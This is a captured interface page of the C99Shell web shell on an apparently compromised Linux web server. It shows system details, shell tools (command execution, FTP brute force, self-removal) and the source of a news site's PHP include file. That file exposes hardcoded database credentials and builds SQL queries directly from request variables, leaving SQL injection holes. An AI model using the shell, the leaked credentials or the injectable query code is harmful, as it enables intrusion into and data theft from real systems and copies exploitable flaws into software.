!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/mina/test/   drwxr-xr-x
Free 3.95 GB of 27.03 GB (14.61%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mnnews.inc (4.76 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?

if ($akcija==clanak){

mysql_connect (localhost, us10505a, proba);
   
mysql_select_db (db10505k);

$result = mysql_query ("SELECT  title,details,date,Slag,imageID FROM news WHERE  ID=$no ");

if ($row = mysql_fetch_array($result)) {

do {
  $before=$row["details"];
  $after=str_replace("#","'",$before);
  $prazno=nl2br($after);
  $id2=$row["imageID"];
  print ("<font face=\"verdana\"><font size=\"1\">");
  print $row["date"];
  print ("</font>");
  print ("<br>");
  print ("<font face=\"verdana\"><font size=\"1\">");
  print $row["Slag"];
  print ("</font>");
print ("<br>");
  print ("<font face=\"verdana\"><font size=\"2\"><font color=\"Black\"><b>");
  print $row["title"];
  print ("</font></b><br>");
  print ("<br>");
  print ("<img src=\"imageShow.php3?id=$id2\">");
  print ("<font face=\"verdana\"><font size=\"2\">");
print ("<br>");
  print $prazno;
  print ("</font>");
  print ("<p>");
  print ("<br>");

} while($row = mysql_fetch_array($result));

} else {print "Nema clanaka!";}

}

elseif ($akcija==busines){

include ('/home/mnnews/public_html/mina/test/monbiznaslov.inc');
}
elseif ($akcija==onama){

include ('/home/mnnews/public_html/mina/test/info/onama.inc');
}

elseif ($akcija==mnnews){

include ('/home/mnnews/public_html/mina/test/info/mnonline.inc');
}

elseif ($akcija==photo){

include ('/home/mnnews/public_html/photogalery/index.inc');
}

elseif ($akcija==pretplata){

include ('/home/mnnews/public_html/mina/test/info/pretplata.inc');
}


elseif ($akcija==kontakt){

include ('/home/mnnews/public_html/mina/test/info/kontakt.inc');
}
elseif ($akcija==linkovi){

include ('/home/mnnews/public_html/mina/test/info/link.inc');
}

elseif ($akcija==mfax){

include ('/home/mnnews/public_html/mina/test/info/mfax.inc');
}

elseif ($akcija==mbiznis){

include ('/home/mnnews/public_html/mina/test/info/mbiznis.inc');
}

elseif ($akcija==fax){

include ('/home/mnnews/public_html/mina/test/faxnaslov.inc');
}

elseif ($akcija==rubrika){
mysql_connect (localhost, us10505a, proba);
   
mysql_select_db (db10505k);

$result = mysql_query ("SELECT  title,details,date,Slag FROM news WHERE topicID=$no ORDER BY ID desc LIMIT 3 ");

if ($row = mysql_fetch_array($result)) {

do {
  $before=$row["details"];
  $after=str_replace("#","'",$before);
  $prazno=nl2br($after);
  print ("<font face=\"verdana\"><font size=\"1\">");
  print $row["date"];
  print ("</font>");
  print ("<br>");
  print ("<font face=\"verdana\"><font size=\"1\">");
  print $row["Slag"];
  print ("</font>");
  print ("<br>");
  print ("<font face=\"verdana\"><font size=\"2\"><font color=\"Black\"><b>");
  print $row["title"];
  print ("</font></b><br>");
  print (" ");
  print $prazno;
  print ("<p>");
  print ("<br>");

} while($row = mysql_fetch_array($result));

} else {print "Nema clanaka!";}
}


elseif ($akcija==pretraga){
mysql_connect (localhost, us10505a, proba);
   
mysql_select_db (db10505k);


$query = mysql_query("SELECT * FROM news WHERE $metode LIKE '%$search%' ORDER BY ID desc");
while ($row = mysql_fetch_array($query))
   {
        $variable1=$row["title"];
        $variable2=$row["details"];
        $variable3=$row["ID"];

do {
$no=$row["ID"];


  print ("<font face=\"verdana\"><font size=\"1\">");
  print $row["date"];
  print ("</font>");
  print ("<br>");
  print ("<font face=\"verdana\"><font size=\"1\">");
  print $row["Slag"];
  print ("</font>");
  print ("<br>");
  print ("<b><font face=\"verdana\"><font size=\"1\"><font color=\"Navy\"><a href=\"index.php3?akcija=clanak&no=$no\">");
  print $row["title"];
  print ("</a></font></b>");
  print (" ");
  print ("<hr size=1>");
} while($row = mysql_fetch_array($query));}


}
else {
mysql_connect (localhost, us10505a, proba);
   
mysql_select_db (db10505k);

$result = mysql_query ("SELECT  ID,title,substring(details,1,300) as details,date,imageID,Slag FROM news WHERE topicId=1 ORDER BY ID desc LIMIT 1");

if ($row = mysql_fetch_array($result)) {

do {
$no=$row["ID"];
$imageID=$row["imageID"];
  print ("<font face=\"verdana\"><font size=\"3\"><font color=\"Black\"><b>");
  print $row["title"];
  print ("</font></b><br>");
  print (" ");
  print ("<img border=\"1\" src=\"imageShow.php3?id=$imageID\">");
  print ("<br>");
  print ("<font face=\"verdana\"><font size=\"2\"><font color=\"Black\">");
  print $row["details"];
  print ("</font>");
  print ("...");
  print ("<font size=\"1\"><font color=\"Navy\"><a href=\"index.php3?akcija=clanak&no=$no\">");
  print (" >> Opsirnije >>");
  print ("</a></font>");
  print ("<br>");
  print ("<br>");
  print ("<br>");

} while($row = mysql_fetch_array($result));

} else {print "Nema clanaka!";}
}



        ?>





:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0036 ]--